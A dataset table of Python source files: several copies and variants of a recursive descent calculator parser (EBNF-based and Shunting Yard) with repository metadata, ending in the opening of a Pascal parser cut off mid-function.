text stringlengths 0 1.05M | meta dict |
|---|---|
# A recursive descent parser that implements an integer calculator
# with variables and conditional statements.
# The grammar is LL(1), suitable for predictive parsing.
#
# EBNF:
#
# <stmt> : <assign_stmt>
# | <if_stmt>
# | <cmp_expr>
#
# <assign_stmt> : set <id> = <cmp_expr>
#
## Note 'else' binds to the innermost 'if', like in C
#
# <if_stmt> : if <cmp_expr> then <stmt> [else <stmt>]
#
# <cmp_expr> : <bitor_expr> [== <bitor_expr>]
# | <bitor_expr> [!= <bitor_expr>]
# | <bitor_expr> [> <bitor_expr>]
# | <bitor_expr> [< <bitor_expr>]
# | <bitor_expr> [>= <bitor_expr>]
# | <bitor_expr> [<= <bitor_expr>]
#
# <bitor_expr> | <bitxor_expr> {| <bitxor_expr>}
#
# <bitxor_expr> | <bitand_expr> {^ <bitand_expr>}
#
# <bitand_expr> | <shift_expr> {& <shift_expr>}
#
# <shift_expr> | <arith_expr> {<< <arith_expr>}
# : <arith_expr> {>> <arith_expr>}
#
# <arith_expr> : <term> {+ <term>}
# | <term> {- <term>}
#
# <term> : <power> {* <power>}
# | <power> {/ <power>}
#
# <power> : <power> ** <factor>
# | <factor>
#
# <factor> : <id>
# | <number>
# | - <factor>
# | ( <cmp_expr> )
#
# <id> : [a-zA-Z_]\w+
# <number> : \d+
#
# Employs EBNF and looping to solve the associativity problem in
# <term> and <arith_expr>.
# Note that <power> is defined recursively and not using EBNF
# grouping {** <factor>}. This is on purpose - as it makes the
# right-associativity of exponentation naturally expressed in
# the recursion.
#
#-----------------------------------------------
# Eli Bendersky (eliben@gmail.com)
# License: this code is in the public domain
# Last modified: March 2009
#-----------------------------------------------
#
from __future__ import with_statement
from contextlib import contextmanager
import operator
try:
import eblib.lexer as lexer
except ImportError:
import lexer
class ParseError(Exception): pass
class CalcParser(object):
""" The calculator statement parser. Evaluates statements
and expressions on the fly, returning a numeric result
for all calc() calls.
"""
def __init__(self):
lex_rules = [
('set', 'SET'),
('if', 'IF'),
('then', 'THEN'),
('else', 'ELSE'),
('\d+', 'NUMBER'),
('[a-zA-Z_]\w*', 'IDENTIFIER'),
('\*\*', '**'),
('!=', '!='),
('==', '=='),
('>=', '>='),
('<=', '<='),
('>>', '>>'),
('<<', '<<'),
('&', '&'),
('\^', '^'),
('\|', '|'),
('<', '<'),
('>', '>'),
('\+', '+'),
('\-', '-'),
('\*', '*'),
('\/', '/'),
('\(', '('),
('\)', ')'),
('=', '='),
]
self.lexer = lexer.Lexer(lex_rules, skip_whitespace=True)
self._clear()
def calc(self, line):
""" Parse a new line of input and return its result.
Variables defined in previous calls to calc can be
used in following ones.
ParseError can be raised in case of errors.
"""
self.lexer.input(line)
self._get_next_token()
val = self._stmt()
if self.cur_token.type != None:
self._error('Unexpected token %s (at #%s)' % (
self.cur_token.val, self.cur_token.pos))
return val
def _clear(self):
self.cur_token = None
self.var_table = {}
self.only_syntax_check = False
# Some rules are parsed with the self.only_syntax_check flag
# turned on. This means that the syntactic structure of the
# rules has to be checked, but no side effects are to be
# executed. Example side effect: assignment to a variable.
#
# This is used, for example, when a branch of an if statement
# is not taken (e.g. the 'else' branch of a true condition),
# but we should still verify that the syntax is correct.
#
# To implement this, the syntax_check context manager can be
# used. When a rule wants to parse some sub-rule with
# self.only_syntax_check turned on, it can do it as follows:
#
# with self._syntax_check():
# ... parse sub-rules
#
# This will ensure that the only_syntax_check flag is set
# before the sub-rules are parsed and turned off after.
#
@contextmanager
def _syntax_check(self):
# We must catch and reraise exceptions (for example,
# ParseError can happen), but turn off the flag anyway,
# so that subsequent statements won't be affected.
#
try:
self.only_syntax_check = True
yield
except:
raise
finally:
self.only_syntax_check = False
def _error(self, msg):
raise ParseError(msg)
def _get_next_token(self):
try:
self.cur_token = self.lexer.token()
if self.cur_token is None:
self.cur_token = lexer.Token(None, None, None)
except lexer.LexerError, e:
self._error('Lexer error at position %d' % e.pos)
def _match(self, type):
""" The 'match' primitive of RD parsers.
* Verifies that the current token is of the given type
* Returns the value of the current token
* Reads in the next token
"""
if self.cur_token.type == type:
val = self.cur_token.val
self._get_next_token()
return val
else:
self._error('Unmatched %s (found %s)' % (
type, self.cur_token.type))
# The toplevel rule of the parser.
#
# <stmt> : <assign_stmt>
# | <if_stmt>
# | <cmp_expr>
#
def _stmt(self):
if self.cur_token.type is None:
return ''
elif self.cur_token.type == 'SET':
return self._assign_stmt()
elif self.cur_token.type == 'IF':
return self._if_stmt()
else:
return self._cmp_expr()
# <if_stmt> : if <cmd_expr> then <stmt> [else <stmt>]
#
def _if_stmt(self):
self._match('IF')
condition = self._cmp_expr()
self._match('THEN')
if condition:
# The condition is true, so we'll evaluate the 'then'
# clause, and only syntax check the 'else' clause,
# if there is one.
#
result = self._stmt()
if self.cur_token.type == 'ELSE':
self._match('ELSE')
with self._syntax_check():
self._stmt()
return result
else:
# The condition is false, so we'll only syntax check
# the 'then' clause, and evaluate the 'else' clause,
# if there is one.
#
with self._syntax_check():
self._stmt()
if self.cur_token.type == 'ELSE':
self._match('ELSE')
return self._stmt()
else:
return None
# <assign_stmt> : set <id> = <cmp_expr>
#
def _assign_stmt(self):
self._match('SET')
id_name = self._match('IDENTIFIER')
self._match('=')
expr_val = self._cmp_expr()
# When syntax checking, don't actually do the assignment
#
if not self.only_syntax_check:
self.var_table[id_name] = expr_val
return expr_val
# <cmp_expr> : <bitor_expr> [== <bitor_expr>]
# | <bitor_expr> [!= <bitor_expr>]
# | <bitor_expr> [> <bitor_expr>]
# | <bitor_expr> [< <bitor_expr>]
# | <bitor_expr> [>= <bitor_expr>]
# | <bitor_expr> [<= <bitor_expr>]
#
_cmp_op_map = {
'==': operator.eq,
'!=': operator.ne,
'>=': operator.ge,
'>': operator.gt,
'<=': operator.le,
'<': operator.lt,
}
def _cmp_expr(self):
lval = self._bitor_expr()
for op_name, op in self._cmp_op_map.iteritems():
if self.cur_token.type == op_name:
self._match(op_name)
return apply(op, [lval, self._bitor_expr()])
# No known comparison op matched...
#
return lval
# <bitor_expr> | <bitxor_expr> {| <bitxor_expr>}
#
def _bitor_expr(self):
lval = self._bitxor_expr()
while self.cur_token.type == '|':
self._match('|')
lval |= self._bitxor_expr()
return lval
# <bitxor_expr> | <bitand_expr> {^ <bitand_expr>}
#
def _bitxor_expr(self):
lval = self._bitand_expr()
while self.cur_token.type == '^':
self._match('^')
lval ^= self._bitand_expr()
return lval
# <bitand_expr> | <shift_expr> {& <shift_expr>}
#
def _bitand_expr(self):
lval = self._shift_expr()
while self.cur_token.type == '&':
self._match('&')
lval &= self._shift_expr()
return lval
# <shift_expr> | <arith_expr> {<< <arith_expr>}
# : <arith_expr> {>> <arith_expr>}
#
def _shift_expr(self):
lval = self._arith_expr()
while self.cur_token.type in ['>>', '<<']:
if self.cur_token.type == '>>':
self._match('>>')
lval >>= self._arith_expr()
elif self.cur_token.type == '<<':
self._match('<<')
lval <<= self._arith_expr()
return lval
# <arith_expr> : <term> {+ <term>}
# | <term> {- <term>}
#
def _arith_expr(self):
lval = self._term()
while self.cur_token.type in ['+', '-']:
if self.cur_token.type == '+':
self._match('+')
lval += self._term()
elif self.cur_token.type == '-':
self._match('-')
lval -= self._term()
return lval
# <term> : <power> {* <power>}
# | <power> {/ <power>}
#
def _term(self):
lval = self._power()
while self.cur_token.type in ['/', '*']:
if self.cur_token.type == '*':
self._match('*')
lval *= self._power()
elif self.cur_token.type == '/':
self._match('/')
lval /= self._power()
return lval
# <power> : <factor> ** <power>
# | <factor>
#
def _power(self):
lval = self._factor()
if self.cur_token.type == '**':
self._match('**')
lval **= self._power()
return lval
# <factor> : <id>
# | <number>
# | - <factor>
# | ( <cmp_expr> )
#
def _factor(self):
if self.cur_token.type == '(':
self._match('(')
val = self._cmp_expr()
self._match(')')
return val
elif self.cur_token.type == 'NUMBER':
return int(self._match('NUMBER'))
elif self.cur_token.type == '-':
self._match('-')
return -(self._factor())
elif self.cur_token.type == 'IDENTIFIER':
id_name = self._match('IDENTIFIER')
# When syntax checking, we don't care if the variable
# was defined prior to use
#
if self.only_syntax_check:
return 0
else:
try:
val = self.var_table[id_name]
except KeyError:
self._error('Unknown identifier `%s`' % id_name)
return val
else:
self._error('Invalid factor `%s`' % self.cur_token.val)
def calculator_prompt():
""" A toy calculator prompt for interactive computations.
"""
print 'Welcome to the calculator. Press Ctrl+C to exit.'
cp = CalcParser()
try:
while True:
try:
line = raw_input('--> ')
print cp.calc(line)
except ParseError, err:
print 'Error:', err
except KeyboardInterrupt:
print '... Thanks for using the calculator.'
if __name__ == '__main__':
import sys
if len(sys.argv) > 1 and sys.argv[1] == '-p':
calculator_prompt()
sys.exit()
p = CalcParser()
#
# If stuff works correctly, this will print 42
#
p.calc('set joe = 4 - 5 - 1') # 0
print p.calc('joe')
#~ p.calc('set mar = joe + 2 ** 4 * -3') # -48
#~ p.calc('set pie = 2 ** 3 ** 2') # 512
#~ p.calc('if joe != 0 then set pie = 3') # pie stays 512
#~ p.calc('if 1 == 1 then set k = 10 else set k = 20') # 10
#~ p.calc('if k > 20 then set k = 12') # k stays 10
#~ p.calc('if k <= 11 then set t = 0 else set t = 2') # 0
#~ print p.calc('pie - (k * -mar) + k + t') # 42
| {
"repo_name": "evandrix/Splat",
"path": "doc/parser/rd_parser_ebnf.py",
"copies": "1",
"size": "13915",
"license": "mit",
"hash": 65001764496569220,
"line_mean": 29.3820960699,
"line_max": 68,
"alpha_frac": 0.4421846928,
"autogenerated": false,
"ratio": 3.84073971846536,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9688943106999789,
"avg_score": 0.018796260853114203,
"num_lines": 458
} |
# A recursive descent parser that implements an integer calculator
# with variables and conditional statements.
#
# This parser implements exactly the same grammar as
# rd_parser_ebnf, but it evaluates expressions using a different
# technique. Instead of recursively evaluating them following the
# EBNF grammar, it uses an embedded infix expression evaluator
# based on the Shunting Yard algorithm.
#
#-----------------------------------------------
# Eli Bendersky (eliben@gmail.com)
# License: this code is in the public domain
# Last modified: March 2009
#-----------------------------------------------
#
from __future__ import with_statement
from contextlib import contextmanager
import operator
try:
import eblib.lexer as lexer
except ImportError:
import lexer
class ParseError(Exception): pass
class CalcParser(object):
""" The calculator statement parser. Evaluates statements
and expressions on the fly, returning a numeric result
for all calc() calls.
"""
def __init__(self):
lex_rules = [
('set', 'SET'),
('if', 'IF'),
('then', 'THEN'),
('else', 'ELSE'),
('\d+', 'NUMBER'),
('[a-zA-Z_]\w*', 'IDENTIFIER'),
('\*\*', '**'),
('!=', '!='),
('==', '=='),
('>=', '>='),
('<=', '<='),
('>>', '>>'),
('<<', '<<'),
('&', '&'),
('\^', '^'),
('\|', '|'),
('<', '<'),
('>', '>'),
('\+', '+'),
('\-', '-'),
('\*', '*'),
('\/', '/'),
('\(', '('),
('\)', ')'),
('=', '='),
]
self.lexer = lexer.Lexer(lex_rules, skip_whitespace=True)
self._clear()
def calc(self, line):
""" Parse a new line of input and return its result.
Variables defined in previous calls to calc can be
used in following ones.
ParseError can be raised in case of errors.
"""
self.lexer.input(line)
self._get_next_token()
val = self._stmt()
if self.cur_token.type != None:
self._error('Unexpected token %s (at #%s)' % (
self.cur_token.val, self.cur_token.pos))
return val
def _clear(self):
self.cur_token = None
self.var_table = {}
self.only_syntax_check = False
# Some rules are parsed with the self.only_syntax_check flag
# turned on. This means that the syntactic structure of the
# rules has to be checked, but no side effects are to be
# executed. Example side effect: assignment to a variable.
#
# This is used, for example, when a branch of an if statement
# is not taken (e.g. the 'else' branch of a true condition),
# but we should still verify that the syntax is correct.
#
# To implement this, the syntax_check context manager can be
# used. When a rule wants to parse some sub-rule with
# self.only_syntax_check turned on, it can do it as follows:
#
# with self._syntax_check():
# ... parse sub-rules
#
# This will ensure that the only_syntax_check flag is set
# before the sub-rules are parsed and turned off after.
#
@contextmanager
def _syntax_check(self):
# We must catch and reraise exceptions (for example,
# ParseError can happen), but turn off the flag anyway,
# so that subsequent statements won't be affected.
#
try:
self.only_syntax_check = True
yield
except:
raise
finally:
self.only_syntax_check = False
def _error(self, msg):
raise ParseError(msg)
def _get_next_token(self):
try:
self.cur_token = self.lexer.token()
if self.cur_token is None:
self.cur_token = lexer.Token(None, None, None)
except lexer.LexerError, e:
self._error('Lexer error at position %d' % e.pos)
def _match(self, type):
""" The 'match' primitive of RD parsers.
* Verifies that the current token is of the given type
* Returns the value of the current token
* Reads in the next token
"""
if self.cur_token.type == type:
val = self.cur_token.val
self._get_next_token()
return val
else:
self._error('Unmatched %s (found %s)' % (
type, self.cur_token.type))
# The toplevel rule of the parser.
#
# <stmt> : <assign_stmt>
# | <if_stmt>
# | <infix_expr>
#
def _stmt(self):
if self.cur_token.type is None:
return ''
elif self.cur_token.type == 'SET':
return self._assign_stmt()
elif self.cur_token.type == 'IF':
return self._if_stmt()
else:
return self._infix_eval()
# <if_stmt> : if <infix_expr> then <stmt> [else <stmt>]
#
def _if_stmt(self):
self._match('IF')
condition = self._infix_eval()
self._match('THEN')
if condition:
# The condition is true, so we'll evaluate the 'then'
# clause, and only syntax check the 'else' clause,
# if there is one.
#
result = self._stmt()
if self.cur_token.type == 'ELSE':
self._match('ELSE')
with self._syntax_check():
self._stmt()
return result
else:
# The condition is false, so we'll only syntax check
# the 'then' clause, and evaluate the 'else' clause,
# if there is one.
#
with self._syntax_check():
self._stmt()
if self.cur_token.type == 'ELSE':
self._match('ELSE')
return self._stmt()
else:
return None
# <assign_stmt> : set <id> = <infix_expr>
#
def _assign_stmt(self):
self._match('SET')
id_name = self._match('IDENTIFIER')
self._match('=')
expr_val = self._infix_eval()
# When syntax checking, don't actually do the assignment
#
if not self.only_syntax_check:
self.var_table[id_name] = expr_val
return expr_val
##
## The infix expression evaluator.
## Returns the value of the evaluated expression.
##
## Infix expressions are numbers and identifiers separated by
## binary (and unary) operators, possibly with parts delimited
## by parentheses. The operators supported by this evaluator
## and their precedences are controlled through the _ops
## table.
##
## Internally, uses two stacks. One for keeping the operations
## that still await results, and another for keeping the
## results.
##
##
def _infix_eval(self):
""" Run the infix evaluator and return the result.
"""
self.op_stack = []
self.res_stack = []
self.op_stack.append(self._sentinel)
self._infix_eval_expr()
return self.res_stack[-1]
class Op(object):
""" Represents an operator recognized by the infix
evaluator. Each operator has a numeric precedence,
and flags specifying whether it's unary/binary and
right/left associative.
"""
def __init__( self, name, op, prec,
unary=False, right_assoc=False):
self.name = name
self.op = op
self.prec = prec
self.unary = unary
self.binary = not self.unary
self.right_assoc = right_assoc
self.left_assoc = not self.right_assoc
def apply(self, *args):
return self.op(*args)
def precedes(self, other):
""" The '>' operator from the Shunting Yard algorithm.
I don't call it '>' on purpose, as its semantics
are unusual (i.e. this is not the familiar
algebraic '>')
"""
if self.binary and other.binary:
if self.prec > other.prec:
return True
elif self.left_assoc and (self.prec == other.prec):
return True
elif self.unary and other.binary:
return self.prec >= other.prec
return False
def __repr__(self):
return '<%s(%s)>' % (self.name, self.prec)
# The operators recognized by the evaluator.
#
_ops = {
'u-': Op('unary -', operator.neg, 90, unary=True),
'**': Op('**', operator.pow, 70, right_assoc=True),
'*': Op('*', operator.mul, 50),
'/': Op('/', operator.div, 50),
'+': Op('+', operator.add, 40),
'-': Op('-', operator.sub, 40),
'<<': Op('<<', operator.lshift, 35),
'>>': Op('>>', operator.rshift, 35),
'&': Op('&', operator.and_, 30),
'^': Op('^', operator.xor, 29),
'|': Op('|', operator.or_, 28),
'>': Op('>', operator.gt, 20),
'>=': Op('>=', operator.ge, 20),
'<': Op('<', operator.lt, 20),
'<=': Op('<=', operator.le, 20),
'==': Op('==', operator.eq, 15),
'!=': Op('!=', operator.ne, 15),
}
# A set of operators that can be unary. If such an operator
# is found, 'u' is prepended to its symbol for finding it in
# the _ops table
#
_unaries = set(['-'])
# Dummy operator with the lowest possible precedence (the
# Sentinel value in the Shunting Yard algorithm)
#
_sentinel = Op(None, None, 0)
def _infix_eval_expr(self):
""" Evaluates an 'expression' - atoms separated by binary
operators.
"""
self._infix_eval_atom()
while ( self.cur_token.type in self._ops and
self._ops[self.cur_token.type].binary):
self._push_op(self._ops[self.cur_token.type])
self._get_next_token()
self._infix_eval_atom()
while self.op_stack[-1] != self._sentinel:
self._pop_op()
def _infix_eval_atom(self):
""" Evaluates an 'atom' - either an identifier/number, or
an atom prefixed by a unary operation, or a full
expression inside parentheses.
"""
if self.cur_token.type in ['IDENTIFIER', 'NUMBER']:
self.res_stack.append(self._compute_val(self.cur_token))
self._get_next_token()
elif self.cur_token.type == '(':
self._get_next_token()
self.op_stack.append(self._sentinel)
self._infix_eval_expr()
self._match(')')
self.op_stack.pop()
elif self.cur_token.type in self._unaries:
self._push_op(self._ops['u' + self.cur_token.type])
self._get_next_token()
self._infix_eval_atom()
def _push_op(self, op):
""" Pushes an operation onto the op stack.
But first computes and removes all higher-precedence
operators from it.
"""
#~ print 'push_op: stack =', self.op_stack
#~ print ' ...', op
while self.op_stack[-1].precedes(op):
self._pop_op()
self.op_stack.append(op)
#~ print ' ... =>', self.op_stack
def _pop_op(self):
""" Pops an operation from the op stack, computing its
result and storing it on the result stack.
"""
#~ print 'pop_op: op_stack =', self.op_stack
#~ print ' ... res_stack =', self.res_stack
top_op = self.op_stack.pop()
if top_op.unary:
self.res_stack.append(top_op.apply(self.res_stack.pop()))
else:
if len(self.res_stack) < 2:
self._error('Not enough arguments for operator %s' % top_op.name)
t1 = self.res_stack.pop()
t0 = self.res_stack.pop()
self.res_stack.append(top_op.apply(t0, t1))
#~ print ' ... => res_stack =', self.res_stack
def _compute_val(self, tok):
""" Compute the value of a number or an identifier.
"""
if tok.type == 'NUMBER':
return int(tok.val)
elif tok.type == 'IDENTIFIER':
if self.only_syntax_check:
return 0
else:
try:
val = self.var_table[tok.val]
except KeyError:
self._error('Unknown identifier `%s`' % tok.val)
return val
else:
assert 0
if __name__ == '__main__':
p = CalcParser()
print p.calc('2 + 4 - (8 + 5) * 3 ** 2 - 1')
#~ p.calc('set p = 1')
#~ p.calc('set p = p * 2')
#~ p.calc('if 5 > 5 then set p = p * 2 else set p = 0')
| {
"repo_name": "michaelyin/code-for-blog",
"path": "2009/py_rd_parser_example/rd_parser_infix_expr.py",
"copies": "12",
"size": "13987",
"license": "unlicense",
"hash": 3738381671224765400,
"line_mean": 32.6336633663,
"line_max": 81,
"alpha_frac": 0.4715092586,
"autogenerated": false,
"ratio": 4.2604325312214435,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": null,
"num_lines": null
} |
# A recursive descent parser that implements an integer calculator
# with variables and conditional statements.
# The grammar is LL(1), suitable for predictive parsing.
#
# EBNF:
#
# <stmt> : <assign_stmt>
# | <if_stmt>
# | <cmp_expr>
#
# <assign_stmt> : set <id> = <cmp_expr>
#
## Note 'else' binds to the innermost 'if', like in C
#
# <if_stmt> : if <cmp_expr> then <stmt> [else <stmt>]
#
# <cmp_expr> : <bitor_expr> [== <bitor_expr>]
# | <bitor_expr> [!= <bitor_expr>]
# | <bitor_expr> [> <bitor_expr>]
# | <bitor_expr> [< <bitor_expr>]
# | <bitor_expr> [>= <bitor_expr>]
# | <bitor_expr> [<= <bitor_expr>]
#
# <bitor_expr> | <bitxor_expr> {| <bitxor_expr>}
#
# <bitxor_expr> | <bitand_expr> {^ <bitand_expr>}
#
# <bitand_expr> | <shift_expr> {& <shift_expr>}
#
# <shift_expr> | <arith_expr> {<< <arith_expr>}
# : <arith_expr> {>> <arith_expr>}
#
# <arith_expr> : <term> {+ <term>}
# | <term> {- <term>}
#
# <term> : <power> {* <power>}
# | <power> {/ <power>}
#
# <power> : <power> ** <factor>
# | <factor>
#
# <factor> : <id>
# | <number>
# | - <factor>
# | ( <cmp_expr> )
#
# <id> : [a-zA-Z_]\w+
# <number> : \d+
#
# Employs EBNF and looping to solve the associativity problem in
# <term> and <arith_expr>.
# Note that <power> is defined recursively and not using EBNF
# grouping {** <factor>}. This is on purpose - as it makes the
# right-associativity of exponentation naturally expressed in
# the recursion.
#
#-----------------------------------------------
# Eli Bendersky (eliben@gmail.com)
# License: this code is in the public domain
# Last modified: March 2009
#-----------------------------------------------
#
from __future__ import with_statement
from contextlib import contextmanager
import operator
try:
import eblib.lexer as lexer
except ImportError:
import lexer
class ParseError(Exception): pass
class CalcParser(object):
""" The calculator statement parser. Evaluates statements
and expressions on the fly, returning a numeric result
for all calc() calls.
"""
def __init__(self):
lex_rules = [
('set', 'SET'),
('if', 'IF'),
('then', 'THEN'),
('else', 'ELSE'),
('\d+', 'NUMBER'),
('[a-zA-Z_]\w*', 'IDENTIFIER'),
('\*\*', '**'),
('!=', '!='),
('==', '=='),
('>=', '>='),
('<=', '<='),
('>>', '>>'),
('<<', '<<'),
('&', '&'),
('\^', '^'),
('\|', '|'),
('<', '<'),
('>', '>'),
('\+', '+'),
('\-', '-'),
('\*', '*'),
('\/', '/'),
('\(', '('),
('\)', ')'),
('=', '='),
]
self.lexer = lexer.Lexer(lex_rules, skip_whitespace=True)
self._clear()
def calc(self, line):
""" Parse a new line of input and return its result.
Variables defined in previous calls to calc can be
used in following ones.
ParseError can be raised in case of errors.
"""
self.lexer.input(line)
self._get_next_token()
val = self._stmt()
if self.cur_token.type != None:
self._error('Unexpected token %s (at #%s)' % (
self.cur_token.val, self.cur_token.pos))
return val
def _clear(self):
self.cur_token = None
self.var_table = {}
self.only_syntax_check = False
# Some rules are parsed with the self.only_syntax_check flag
# turned on. This means that the syntactic structure of the
# rules has to be checked, but no side effects are to be
# executed. Example side effect: assignment to a variable.
#
# This is used, for example, when a branch of an if statement
# is not taken (e.g. the 'else' branch of a true condition),
# but we should still verify that the syntax is correct.
#
# To implement this, the syntax_check context manager can be
# used. When a rule wants to parse some sub-rule with
# self.only_syntax_check turned on, it can do it as follows:
#
# with self._syntax_check():
# ... parse sub-rules
#
# This will ensure that the only_syntax_check flag is set
# before the sub-rules are parsed and turned off after.
#
@contextmanager
def _syntax_check(self):
# We must catch and reraise exceptions (for example,
# ParseError can happen), but turn off the flag anyway,
# so that subsequent statements won't be affected.
#
try:
self.only_syntax_check = True
yield
except:
raise
finally:
self.only_syntax_check = False
def _error(self, msg):
raise ParseError(msg)
def _get_next_token(self):
try:
self.cur_token = self.lexer.token()
if self.cur_token is None:
self.cur_token = lexer.Token(None, None, None)
except lexer.LexerError, e:
self._error('Lexer error at position %d' % e.pos)
def _match(self, type):
""" The 'match' primitive of RD parsers.
* Verifies that the current token is of the given type
* Returns the value of the current token
* Reads in the next token
"""
if self.cur_token.type == type:
val = self.cur_token.val
self._get_next_token()
return val
else:
self._error('Unmatched %s (found %s)' % (
type, self.cur_token.type))
# The toplevel rule of the parser.
#
# <stmt> : <assign_stmt>
# | <if_stmt>
# | <cmp_expr>
#
def _stmt(self):
if self.cur_token.type is None:
return ''
elif self.cur_token.type == 'SET':
return self._assign_stmt()
elif self.cur_token.type == 'IF':
return self._if_stmt()
else:
return self._cmp_expr()
# <if_stmt> : if <cmd_expr> then <stmt> [else <stmt>]
#
def _if_stmt(self):
self._match('IF')
condition = self._cmp_expr()
self._match('THEN')
if condition:
# The condition is true, so we'll evaluate the 'then'
# clause, and only syntax check the 'else' clause,
# if there is one.
#
result = self._stmt()
if self.cur_token.type == 'ELSE':
self._match('ELSE')
with self._syntax_check():
self._stmt()
return result
else:
# The condition is false, so we'll only syntax check
# the 'then' clause, and evaluate the 'else' clause,
# if there is one.
#
with self._syntax_check():
self._stmt()
if self.cur_token.type == 'ELSE':
self._match('ELSE')
return self._stmt()
else:
return None
# <assign_stmt> : set <id> = <cmp_expr>
#
def _assign_stmt(self):
self._match('SET')
id_name = self._match('IDENTIFIER')
self._match('=')
expr_val = self._cmp_expr()
# When syntax checking, don't actually do the assignment
#
if not self.only_syntax_check:
self.var_table[id_name] = expr_val
return expr_val
# <cmp_expr> : <bitor_expr> [== <bitor_expr>]
# | <bitor_expr> [!= <bitor_expr>]
# | <bitor_expr> [> <bitor_expr>]
# | <bitor_expr> [< <bitor_expr>]
# | <bitor_expr> [>= <bitor_expr>]
# | <bitor_expr> [<= <bitor_expr>]
#
_cmp_op_map = {
'==': operator.eq,
'!=': operator.ne,
'>=': operator.ge,
'>': operator.gt,
'<=': operator.le,
'<': operator.lt,
}
def _cmp_expr(self):
lval = self._bitor_expr()
for op_name, op in self._cmp_op_map.iteritems():
if self.cur_token.type == op_name:
self._match(op_name)
return apply(op, [lval, self._bitor_expr()])
# No known comparison op matched...
#
return lval
# <bitor_expr> | <bitxor_expr> {| <bitxor_expr>}
#
def _bitor_expr(self):
lval = self._bitxor_expr()
while self.cur_token.type == '|':
self._match('|')
lval |= self._bitxor_expr()
return lval
# <bitxor_expr> | <bitand_expr> {^ <bitand_expr>}
#
def _bitxor_expr(self):
lval = self._bitand_expr()
while self.cur_token.type == '^':
self._match('^')
lval ^= self._bitand_expr()
return lval
# <bitand_expr> | <shift_expr> {& <shift_expr>}
#
def _bitand_expr(self):
lval = self._shift_expr()
while self.cur_token.type == '&':
self._match('&')
lval &= self._shift_expr()
return lval
# <shift_expr> | <arith_expr> {<< <arith_expr>}
# : <arith_expr> {>> <arith_expr>}
#
def _shift_expr(self):
lval = self._arith_expr()
while self.cur_token.type in ['>>', '<<']:
if self.cur_token.type == '>>':
self._match('>>')
lval >>= self._arith_expr()
elif self.cur_token.type == '<<':
self._match('<<')
lval <<= self._arith_expr()
return lval
# <arith_expr> : <term> {+ <term>}
# | <term> {- <term>}
#
def _arith_expr(self):
lval = self._term()
while self.cur_token.type in ['+', '-']:
if self.cur_token.type == '+':
self._match('+')
lval += self._term()
elif self.cur_token.type == '-':
self._match('-')
lval -= self._term()
return lval
# <term> : <power> {* <power>}
# | <power> {/ <power>}
#
def _term(self):
lval = self._power()
while self.cur_token.type in ['/', '*']:
if self.cur_token.type == '*':
self._match('*')
lval *= self._power()
elif self.cur_token.type == '/':
self._match('/')
lval /= self._power()
return lval
# <power> : <factor> ** <power>
# | <factor>
#
def _power(self):
lval = self._factor()
if self.cur_token.type == '**':
self._match('**')
lval **= self._power()
return lval
# <factor> : <id>
# | <number>
# | - <factor>
# | ( <cmp_expr> )
#
def _factor(self):
if self.cur_token.type == '(':
self._match('(')
val = self._cmp_expr()
self._match(')')
return val
elif self.cur_token.type == 'NUMBER':
return int(self._match('NUMBER'))
elif self.cur_token.type == '-':
self._match('-')
return -(self._factor())
elif self.cur_token.type == 'IDENTIFIER':
id_name = self._match('IDENTIFIER')
# When syntax checking, we don't care if the variable
# was defined prior to use
#
if self.only_syntax_check:
return 0
else:
try:
val = self.var_table[id_name]
except KeyError:
self._error('Unknown identifier `%s`' % id_name)
return val
else:
self._error('Invalid factor `%s`' % self.cur_token.val)
def calculator_prompt():
""" A toy calculator prompt for interactive computations.
"""
print 'Welcome to the calculator. Press Ctrl+C to exit.'
cp = CalcParser()
try:
while True:
try:
line = raw_input('--> ')
print cp.calc(line)
except ParseError, err:
print 'Error:', err
except KeyboardInterrupt:
print '... Thanks for using the calculator.'
if __name__ == '__main__':
import sys
if len(sys.argv) > 1 and sys.argv[1] == '-p':
calculator_prompt()
sys.exit()
p = CalcParser()
#
# If stuff works correctly, this will print 42
#
p.calc('set joe = 4 - 5 - 1') # 0
print p.calc('joe')
#~ p.calc('set mar = joe + 2 ** 4 * -3') # -48
#~ p.calc('set pie = 2 ** 3 ** 2') # 512
#~ p.calc('if joe != 0 then set pie = 3') # pie stays 512
#~ p.calc('if 1 == 1 then set k = 10 else set k = 20') # 10
#~ p.calc('if k > 20 then set k = 12') # k stays 10
#~ p.calc('if k <= 11 then set t = 0 else set t = 2') # 0
#~ print p.calc('pie - (k * -mar) + k + t') # 42
| {
"repo_name": "bowlofstew/code-for-blog",
"path": "2009/py_rd_parser_example/rd_parser_ebnf.py",
"copies": "12",
"size": "14356",
"license": "unlicense",
"hash": -3741586921305043500,
"line_mean": 29.3820960699,
"line_max": 68,
"alpha_frac": 0.4286012817,
"autogenerated": false,
"ratio": 3.8852503382949934,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": null,
"num_lines": null
} |
""" A recursive descent pascal parser. """
import logging
from ...common import CompilerError
from ..tools.recursivedescent import RecursiveDescentParser
from .nodes import expressions, statements, symbols, types
from .symbol_table import Scope
class Parser(RecursiveDescentParser):
""" Parses pascal into ast-nodes """
logger = logging.getLogger("pascal.parser")
def __init__(self, diag):
super().__init__()
self.diag = diag
self.current_scope = None
self.mod = None
def parse_source(self, tokens, context):
""" Parse a module from tokens """
self.logger.debug("Parsing source")
self.context = context
self.init_lexer(tokens)
self._integer_type = context.get_type("integer")
self._boolean_type = context.get_type("boolean")
self._real_type = context.get_type("real")
self._char_type = context.get_type("char")
self._string_type = context.get_type("string")
self.current_scope = context.root_scope
try:
program = self.parse_program(context)
except CompilerError as ex:
self.diag.add_diag(ex)
raise
self.logger.debug("Parsing complete")
context.add_program(program)
return program
def add_symbol(self, sym):
""" Add a symbol to the current scope """
if self.current_scope.has_symbol(sym.name, include_parent=False):
self.error(
"Redefinition of {0}".format(sym.name), loc=sym.location
)
else:
self.current_scope.add_symbol(sym)
def has_local_symbol(self, name: str) -> bool:
return self.current_scope.has_symbol(name, include_parent=False)
def lookup_symbol(self, name: str):
if self.current_scope.has_symbol(name):
return self.current_scope.get_symbol(name)
else:
raise KeyError(name)
def enter_scope(self):
""" Enter a lexical scope. """
scope = Scope(self.current_scope)
self.current_scope = scope
return scope
def leave_scope(self):
""" Leave the current lexical scope. """
self.current_scope = self.current_scope.parent
def parse_program(self, context):
""" Parse a program """
self.consume("program")
name = self.consume("ID")
if self.has_consumed("("):
args = []
args.append(self.consume("ID"))
while self.has_consumed(","):
args.append(self.consume("ID"))
